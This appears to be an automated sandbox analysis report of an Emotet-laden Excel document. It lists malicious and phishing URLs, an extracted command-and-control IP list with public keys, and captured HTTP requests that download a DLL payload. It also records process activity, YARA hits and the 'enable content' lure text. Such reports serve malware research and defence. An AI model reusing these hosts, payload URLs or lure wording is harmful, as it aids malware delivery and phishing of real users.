Source: http://91.240.118.168/vvv/ppp/fe.htmlhttp://91.240.118.168/vvv/ppp/fe.html | Avira URL Cloud: Label: malware
Source: http://crm.compracasaenhouston.com/hs4d8a/c0s13I/ | Avira URL Cloud: Label: phishing
Source: http://91.240.118.168 | URL Reputation: Label: malware
Source: 11.2.rundll32.exe.200000.1.unpack | Malware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
Source: 364453688149503140239183.xls | ReversingLabs: Detection: 18%
Source: ayoobeducationaltrust.in | Virustotal: Detection: 9%
Source: http://cmit.valestudios.com/wp-admin/RueGJ41A/ | Virustotal: Detection: 12%
Source: C:\ProgramData\QWER.dll | Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,

                            Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 91.240.118.168:80
Source: global traffic | DNS query: name: ayoobeducationaltrust.in

                            Networking

Source: Traffic | Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.168:80
Source: Malware configuration extractor | IPs: 160.16.102.168:80
Source: Malware configuration extractor | IPs: 131.100.24.231:80
Source: Malware configuration extractor | IPs: 200.17.134.35:7080
Source: Malware configuration extractor | IPs: 207.38.84.195:8080
Source: Malware configuration extractor | IPs: 212.237.56.116:7080
Source: Malware configuration extractor | IPs: 58.227.42.236:80
Source: Malware configuration extractor | IPs: 104.251.214.46:8080
Source: Malware configuration extractor | IPs: 158.69.222.101:443
Source: Malware configuration extractor | IPs: 192.254.71.210:443
Source: Malware configuration extractor | IPs: 46.55.222.11:443
Source: Malware configuration extractor | IPs: 45.118.135.203:7080
Source: Malware configuration extractor | IPs: 107.182.225.142:8080
Source: Malware configuration extractor | IPs: 103.75.201.2:443
Source: Malware configuration extractor | IPs: 104.168.155.129:8080
Source: Malware configuration extractor | IPs: 195.154.133.20:443
Source: Malware configuration extractor | IPs: 159.8.59.82:8080
Source: Malware configuration extractor | IPs: 110.232.117.186:8080
Source: Malware configuration extractor | IPs: 45.142.114.231:8080
Source: Malware configuration extractor | IPs: 41.76.108.46:8080
Source: Malware configuration extractor | IPs: 203.114.109.124:443
Source: Malware configuration extractor | IPs: 50.116.54.215:443
Source: Malware configuration extractor | IPs: 209.59.138.75:7080
Source: Malware configuration extractor | IPs: 185.157.82.211:8080
Source: Malware configuration extractor | IPs: 164.68.99.3:8080
Source: Malware configuration extractor | IPs: 162.214.50.39:7080
Source: Malware configuration extractor | IPs: 138.185.72.26:8080
Source: Malware configuration extractor | IPs: 178.63.25.185:443
Source: Malware configuration extractor | IPs: 51.15.4.22:443
Source: Malware configuration extractor | IPs: 81.0.236.90:443
Source: Malware configuration extractor | IPs: 216.158.226.206:443
Source: Malware configuration extractor | IPs: 45.176.232.124:443
Source: Malware configuration extractor | IPs: 162.243.175.63:443
Source: Malware configuration extractor | IPs: 212.237.17.99:8080
Source: Malware configuration extractor | IPs: 45.118.115.99:8080
Source: Malware configuration extractor | IPs: 129.232.188.93:443
Source: Malware configuration extractor | IPs: 173.214.173.220:8080
Source: Malware configuration extractor | IPs: 178.79.147.66:8080
Source: Malware configuration extractor | IPs: 176.104.106.96:8080
Source: Malware configuration extractor | IPs: 51.38.71.0:443
Source: Malware configuration extractor | IPs: 173.212.193.249:8080
Source: Malware configuration extractor | IPs: 217.182.143.207:443
Source: Malware configuration extractor | IPs: 212.24.98.99:8080
Source: Malware configuration extractor | IPs: 159.89.230.105:443
Source: Malware configuration extractor | IPs: 79.172.212.216:8080
Source: Malware configuration extractor | IPs: 212.237.5.209:443
Source: global traffic | HTTP traffic detected:
  GET /vvv/ppp/fe.png HTTP/1.1
  Host: 91.240.118.168
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /cms/LmOOeDnNo0dh4vkN/ HTTP/1.1
  Host: ayoobeducationaltrust.in
  Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 20:28:51 GMTServer: ApacheSet-Cookie: 61f4520308e3e=1643401731; expires=Fri, 28-Jan-2022 20:29:51 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Fri, 28 Jan 2022 20:28:51 GMTExpires: Fri, 28 Jan 2022 20:28:51 GMTContent-Disposition: attachment; filename="xfm.dll"Content-Transfer-Encoding: binaryContent-Length: 548864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownload
                            Source: global trafficHTTP traffic detected: GET /vvv/ppp/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.168Connection: Keep-Alive
                            Source: Joe Sandbox ViewASN Name: OnlineSASFR OnlineSASFR
                            Source: Joe Sandbox ViewASN Name: S-NET-ASPL S-NET-ASPL
                            Source: Joe Sandbox ViewIP Address: 195.154.133.20 195.154.133.20
                            Source: Joe Sandbox ViewIP Address: 185.157.82.211 185.157.82.211
                            Source: unknownNetwork traffic detected: IP country count 22
                            Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htmJump to behavior
                            Source: unknownDNS traffic detected: queries for: ayoobeducationaltrust.in
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10012C30 _memset,connect,_strcat,send,recv,
                            Source: unknownTCP traffic detected without corresponding DNS query: 91.240.118.168
                            Source: mshta.exe, 00000004.00000003.424627198.000000000054C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448920352.000000000054C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: mshta.exe, 00000004.00000003.424627198.000000000054C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.448920352.000000000054C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_1001B43F GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
                            Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS

                            E-Banking Fraud

                            Source: Yara matchFile source: 12.2.rundll32.exe.2a0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.b50000.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.840000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.170000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2e70000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.b00000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2590000.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.26a0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.350000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.1e0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.ae0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2910000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.bc0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3a0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2d0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2ec0000.17.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.27e0000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2d00000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2590000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.210000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.310000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.27e0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2890000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.b50000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2e90000.16.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.10000000.18.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.470000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2f40000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.a00000.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.b10000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000F.00000002.616456228.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512416856.0000000002F40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.683540331.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617069039.00000000008F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564980270.00000000030B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616617596.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564788037.0000000002851000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.679113549.0000000000351000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681597853.0000000002C91000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617285505.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564756951.00000000027E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564304775.00000000002A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564841038.0000000002910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512269279.0000000002820000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617389585.0000000002590000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.680671662.00000000026A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.680752870.00000000026D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.679483027.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617514155.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.679062553.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681792444.0000000002EC1000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.620719407.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681556359.0000000002C60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.679555584.0000000000CC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.511939105.0000000000441000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681640222.0000000002D00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.566974916.0000000000B01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681204228.0000000002860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.620541885.00000000002A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616727376.00000000003A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617246098.0000000000BC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.460211581.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.511964806.0000000000470000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.620492867.0000000000270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564618433.0000000000AC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564587056.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617654875.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617205636.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.566592140.0000000000210000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565021247.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512350669.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617317530.0000000002521000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.679178655.00000000005A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512137672.0000000000AE1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564430858.00000000004E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.680211767.00000000025E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.511829011.00000000001E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.511865871.0000000000310000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.511778687.0000000000170000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564371056.00000000004B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564944730.0000000002FE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.514931269.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681736430.0000000002E90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.679134510.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.567255358.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617576888.0000000002F61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.460063482.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564702502.0000000000BD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512384350.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681713030.0000000002E61000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.681364704.0000000002891000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512450327.0000000003021000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564887911.0000000002E71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.679503750.0000000000B81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.616926650.0000000000840000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564646354.0000000000B20000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512203615.0000000000BD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617169491.0000000000A31000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512323278.0000000002DD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.514649253.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564333785.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512502215.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.617141455.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.514700543.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.512166505.0000000000B10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match, File source: C:\ProgramData\QWER.dll, type: DROPPED

                            System Summary

                            Source: Screenshot number: 4, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 18 19 20 21 22 23 24
                            Source: Screenshot number: 4, Screenshot OCR: DOCUMENT IS PROTECTED. 13 14 15 Previewing is not available for protected documents. 16 17 Yo
                            Source: Screenshot number: 4, Screenshot OCR: protected documents. 16 17 You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 4, Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 18 19 20 21 22 23 24 25 26 27 28 29 3
                            Source: Document image extraction number: 0, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 0, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 0, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 0, Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                            Source: Document image extraction number: 1, Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                            Source: Document image extraction number: 1, Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                            Source: Document image extraction number: 1, Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                            Source: Screenshot number: 8, Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 19 20 21 22 23 24 U LI
                            Source: Screenshot number: 8, Screenshot OCR: DOCUMENT IS PROTECTED. 13 14 15 , , Previewing is not available for protected documents. 16 ::
                            Source: Screenshot number: 8, Screenshot OCR: protected documents. 16 :: You have to press :ENABLE EDITING" and "ENABLE CONTENT" buttons to pre
                            Source: Screenshot number: 8, Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 19 20 21 22 23 24 U LI 25 26 27 28 29
                            Source: 364453688149503140239183.xls, Stream path 'Workbook'
                            Source: 364453688149503140239183.xls.0.dr, Stream path 'Workbook'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\ProgramData\QWER.dll
                            Source: 364453688149503140239183.xls, Initial sample: EXEC
                            Source: 364453688149503140239183.xls, Initial sample: EXEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035AA30
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00341A56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034EA99
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00348B3D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035BB23
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00350B19
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034BB7E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035CB5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00357BA6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00354B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00349B83
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00358BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00342BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00359BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00347C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00343C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035AC3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00360C14
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00344C5D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00356C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035DCF7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00355CC4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00346D24
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00356DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00357DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00349DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00343E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00360E3A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035BE27
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00345E60
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035AE6D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00350E53
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034EE81
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034AEFB
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00344EE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00359EEC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0035DEDC
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00360F33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034CF47
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00347FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0034DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E9011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001E3C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F20BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001ED6D8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001EF8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F4116
